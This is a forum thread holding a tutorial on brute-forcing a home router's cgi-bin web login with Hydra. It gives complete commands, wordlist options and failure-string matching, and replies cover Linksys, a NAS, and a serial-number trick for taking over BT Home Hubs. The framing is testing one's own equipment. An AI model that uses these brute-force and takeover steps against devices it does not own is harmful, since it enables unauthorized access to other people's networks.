Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: Using hydra to bruteforce a router with cgi-bin/[xy] authentication

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    15

    Lightbulb Using hydra to bruteforce a router with cgi-bin/[xy] authentication

    I recently started playing around with Hydra and tried to hack my router. After searching the forum and googleing around a while I noticed that there are only some howto's for routers that have http-auth authentication. That is, when you go to 192.168.2.1 e.g. and before showing anything you have to enter login and password in a popup. My router (T-Com Sinus 154 DSL Basic 3) and many others I've dealt with so far work differently. When I want to login to my router, I have to go to 192.168.2.1, a web interface with a password field shows up, and I have to enter the password which is then checked by /cgi-bin/login.exe via http-post.

    It was quite tricky to find out how to use this authentication with hydra, so I guess there are some of you that can benefit from this. I'll describe how I did it, so you can adapt the method and use it with your own router.

    First of all I examined the login page of the web interface. Be sure to look at the frame source and not the frameset. You should see the form and the action, here's what I saw:

    The form is defined as:

    Code:
    <form name="tF" method="post" action="/cgi-bin/login.exe" onSubmit="evaltF();">
    Somewhere in the form there will be the field that takes the password:

    Code:
    <input type="password" name="pws" class="stylepwd" size="12" maxlength="12">
    This is probably the most important data you need. You need to write down the field name ("pws" in my case). The size attribute comes in very handy too because it tells us that the password's max length is 12 characters.

    After that I tried to get familiar with Hydra's options. I figured out that you need the following options:

    Code:
    -l ""
    Sets the login name. In the end I don't need a login name but hydra gets kind of pissed when you don't pass something, so I gave an empty string.

    Code:
    -P passwords.txt
    The wordlist to use for the password

    Code:
    -t 1
    1 task only, not really neccesary, I just wanted to make sure Hydra doesn't choke on too many requests

    Code:
    -f
    Hydra shall stop when a working password is found

    Code:
    -v -V
    be verbose. and even more. I skipped that in the final version but it's ok for debugging

    Code:
    192.168.2.1
    the victim's ip

    Code:
    http-post-form
    the method to use

    Code:
    /cgi-bin/login.exe:pws=^PASS^:loginpserr.htm
    This is the most important part. Here we tell Hydra what to pass the passwords to. The argument consists of three parts separated by ":".

    The first part is the script that takes the POST data, we found that in the frame source above.

    The second part is the field name of the password field with an added =^PASS^. ^PASS^ is the variable that hydra substitutes with the passwords in the wordlist.

    The third part is the "incorrect" condition. Hydra has to find out somehow if the current password that was send to the router is correct or not. You have to find a string that is actually IN A NEGATIVE RESPONSE from the router. As we don't have the password yet we can't know what the router will send if the password is correct, therefore we have to check if it is NOT, which we can find out easily. To find out what the router sends back to hydra I used Wireshark.

    Open up wireshark, go to the router login page, start capturing and then login with a wrong password. After that, stop capturing and apply a "http" filter. You will see the POST data sent from hydra to the router (you should also see the "pws=blabla" in the details, that's where hydra sends the passwords from the wordlist). Below that you'll find the router answer. In my case it says something like "This page has moved to loginpserr.htm" packed in some basic HTML. So I used the string loginpserr.htm to validate the .. uhm... faultyness. OMFG %-]

    Hydra will consider a password as CORRECT when the router answer DOES NOT contain the given string. So be sure to take an expression that somehow sounds like "incorrect" oder "wrong". If you took "the" for example, and the POSITVE response would be something like "the password you entered was correct", hydra will not recognize it as correct but incorrect.

    Here's the complete example:

    Code:
    hydra -l "" -P passwords.txt -t 1 -f -v -V 192.168.2.1 http-post-form /cgi-bin/login.exe:pws=^PASS^:loginpserr.htm
    If your router does not only need a password but also a username, you can easily add the according login name to the last part. So if you need to send the field "login" or whatever it is called in your case with the value "admin" as the only username you could use

    Code:
    /cgi-bin/login.exe:login=admin&pws=^PASS^:loginpserr.htm
    When you need to try a whole username list then you can specify the list via

    Code:
    -L usernames.txt
    and

    Code:
    /cgi-bin/login.exe:login=^USER^&pws=^PASS^:loginpserr.htm

    Ok, looks like I've just finished my very first howto, hope you like it. Please let me know if this works for you. Have fun! =)

    RaginRob
    I love deadlines. I like the whooshing sound they make as they fly by.

    Douglas Adams

  2. #2
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    This looks like a promising tutorial indeed

    Nice RaginRob, thanks for sharing the tutorial with everyone. I briefly read through it and of course copied/pasted it in a txt file for myself for offline viewing.

    I have a question for you about this tutorial. Here in the UK our provider BT [British Telecom] dispatch their BTHomeHub to all subscribers. Now this modem/router uses a Linux kernel which is pretty cool but thats another story...

    ...What I am meaning to ask is once you surf to http://192.168.1.254 for the first time, you are not prompted with the usual Username/Password. Recently BT deployed an upgrade to their security of the BTHomeHub and when I went to my gateway a few months ago I was prompted to change my gateway password by inserting the serial number of the BTHomeHub into the text field along with my new password. The serial number was found on the bottom of my BTHomeHub.

    Now, is there (or would there be) a security risk for people who never surf to their gateway? As you are prompted to insert a new password along with your serial of the hub.

    Great tutorial, I can't wait to test it out

  3. #3
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    15

    Default

    Hi Deny,

    thank you for your response. I took a brief look at the wiki page you posted, seems like this Home Hub is not the safest thing on earth according to the issues the GNUCITIZEN guys found. If - after the update - the WLAN settings are set back to defaults, then anyone could access the Hub if there was a way to calculate the serial, I guess. But I don't know if the hub checks the serial you have to enter against an internal hardcoded serial number. In that case you would need direct physical access to the Hub which would render a wireless attack futile. Hard to say without having the box at home to play with... :-)
    I love deadlines. I like the whooshing sound they make as they fly by.

    Douglas Adams

  4. #4
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    Yes the answer is to the last question, if your key is de-coded then someone jumps onto your router they surf to the admin page and are presented with the "as this is your first time visiting this page please enter a new password and your serial number" now the way round this is to download the BT home hub recovery tool and attempt to connect to the hub, your once again chalanged with a login box but in the top corner very nicely is a batch of numbers of letters, this is your serial number, simply add CP to the web form on the admin page and away you go, full control of one said bthome hub

  5. #5
    Good friend of the forums
    Join Date
    Jan 2010
    Location
    outside chicago, il
    Posts
    442

    Default

    Good tutorial however http-get would be simplier to use. I.E.
    hydra -l "" -P word.txt -v -e ns 192.168.1.1 http-get /
    -l is for a username which is null in this case
    -P is a wordlist of passwords to try
    -v is for verbose
    -e try no password and password the ip address of the device one of the currently supported options
    / is where you have to put in the username and password.

    This works for the Linksys equipment I have. When I goto its IP 192.168.1.1, a box pops up and asks for a username and password. Try it and let me know if it works for you.
    I like the bleeding edge, but I don't like blood loss

  6. #6
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    15

    Default

    @bofh28

    In case there's a popup box where you have to enter the login and password (like in your Linksys) the http-get method is definitely the right way to do it.

    In my case, however, there is no popup window, that's why I had to do it as described above. When I go to 192.168.2.1 a welcome screen shows up and some Javascript opens up another window. This new window is a frameset, one frame contains the form with the password entry field. So http-get doesn't work with that kind of login.
    I love deadlines. I like the whooshing sound they make as they fly by.

    Douglas Adams

  7. #7
    Member The_Denv's Avatar
    Join Date
    Nov 2006
    Posts
    364

    Default

    Quote Originally Posted by RaginRob View Post
    Hi Deny,

    thank you for your response. I took a brief look at the wiki page you posted, seems like this Home Hub is not the safest thing on earth according to the issues the GNUCITIZEN guys found. If - after the update - the WLAN settings are set back to defaults, then anyone could access the Hub if there was a way to calculate the serial, I guess. But I don't know if the hub checks the serial you have to enter against an internal hardcoded serial number. In that case you would need direct physical access to the Hub which would render a wireless attack futile. Hard to say without having the box at home to play with... :-)
    Your welcome
    Yeah this box has major vulnerabilities with it, its a complete security hazard. I haven't subscribed to the VoIP service with BT, but when I do apparently this box has several VoIP security holes that I can not wait to discover. GNUCitizen's Link

    Quote Originally Posted by Wulfy View Post
    Yes the answer is to the last question, if your key is de-coded then someone jumps onto your router they surf to the admin page and are presented with the "as this is your first time visiting this page please enter a new password and your serial number" now the way round this is to download the BT home hub recovery tool and attempt to connect to the hub, your once again chalanged with a login box but in the top corner very nicely is a batch of numbers of letters, this is your serial number, simply add CP to the web form on the admin page and away you go, full control of one said bthome hub
    The BTHomeHub Recovery Tool Manual states you need to have Ethernet access to the hub. Its meant to replace the firmware of the hub...I am going to look into this.

  8. #8
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    RaginRob, The_Denv, Wulfy, bofh28:

    VERY good tutorial/information. This is going to help a lot of people. The tutorial was very well laid out, easy to read, and to the point. The information about the BT serial flaw, priceless. I look foreward to anything else you guys have to contribute, as this is exactly the kind of HOW-TO people want to see.

    Keep up the good work and happy hacking!!!!



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  9. #9
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    The static.btopenworld.com/broadband/documents/BT_Home_Hub_recovery_instructions_Windows.pdf"]BTHomeHub Recovery Tool Manual states you need to have Ethernet access to the hub. Its meant to replace the firmware of the hub...I am going to look into this.[/QUOTE]

    Nope wifi works fine ive tried it on 2 of the hubs i got hold of as spares so unless they fix it to stop broadcasting the serial of the box to the repair tool its kinda gonna carry on happerning as updating the recovery tool whont help :P

    I think what that link means is that to do a sucesfull recovery you must have ethernet, as your not trying to recover the firmware its a mute point

  10. #10
    Member
    Join Date
    Jun 2008
    Posts
    101

    Default

    First of all let me say this is a well explained tutorial! At home I have a Buffalo NAS that uses cgi-bin authentication. Below you can see the source code info...

    <form id="frmNas" name="frmNas" method="post" action="/cgi-bin/top.cgi">
    <input type="text" id="txtAuthLoginUser" name="txtAuthLoginUser" value="" size="24" maxlength="20" />
    <input type="password" id="txtAuthLoginPassword" name="txtAuthLoginPassword" value="" size="24" maxlength="20" />
    It has a built-in user "admin"... So far I have everything except the "incorrect condition"... Here is how I'm executing Hydra with Wireshark to see what the NAS sends back...

    hydra -l "" -P shortdict.txt -t 1 -f -v -V 192.168.1.3 http-post-form /cgi-bin/top.cgi:txtAuthLoginUser=admin&txtAuthLoginPasswor d=^PASS^
    I'm actually stuck on the last part, "incorrect" condition. I ran wireshark and these are the responses it gave... In the image there are 2 POST by Hydra followed by TCP responses from the NAS.

    "htttp://img125.imageshack.us/img125/4821/authsnapshotpd0.jpg"

    Feel free to ask for additional info.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •